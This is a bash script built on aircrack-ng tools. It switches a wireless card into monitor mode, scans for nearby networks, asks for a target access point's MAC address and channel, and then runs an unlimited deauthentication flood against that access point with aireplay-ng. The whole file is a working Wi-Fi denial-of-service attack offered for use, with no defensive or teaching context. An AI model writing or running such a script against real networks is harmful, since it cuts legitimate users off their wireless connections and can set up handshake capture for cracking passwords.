#!/bin/bash

if [ "$(id -u)" -ne 0 ]; then
  echo "This script must be run as root, use 'sudo' or run it as root."
  exit 1
fi

command -v aircrack-ng > /dev/null 2>&1 || { echo >&2 "I require aircrack-ng but it's not installed. Install it. Aborting."; exit 1; }
command -v iw > /dev/null 2>&1 || { echo >&2 "I require iw but it's not installed. Install it. Aborting."; exit 1; }
command -v iwconfig > /dev/null 2>&1 || { echo >&2 "I require wireless_tools but it's not installed. Install it. Aborting."; exit 1; }

usage() {
  echo "Usage: $0 IFACE"
  echo "Example: $0 wlan0"
  exit 1
}

if [ "$#" -ne 1 ]; then
  usage
fi

IFACE="$1"

iw dev $IFACE set power_save off

deauth() {
  echo -n "Enter target MAC address (e.g. FF:FF:FF:FF:FF:FF): "
  read MAC
  echo -n "Enter target channel (e.g. 11): "
  read CH

  trap "trap 'airmon-ng stop $IFACE; exit 1' SIGINT SIGTERM SIGHUP SIGQUIT; aireplay-ng --deauth 0 -a $MAC $IFACE" SIGINT SIGTERM SIGHUP SIGQUIT

  iwconfig $IFACE channel $CH
  airodump-ng --bssid $MAC --channel $CH $IFACE
}

trap deauth SIGINT SIGTERM SIGHUP SIGQUIT

airmon-ng start $IFACE

airodump-ng $IFACE
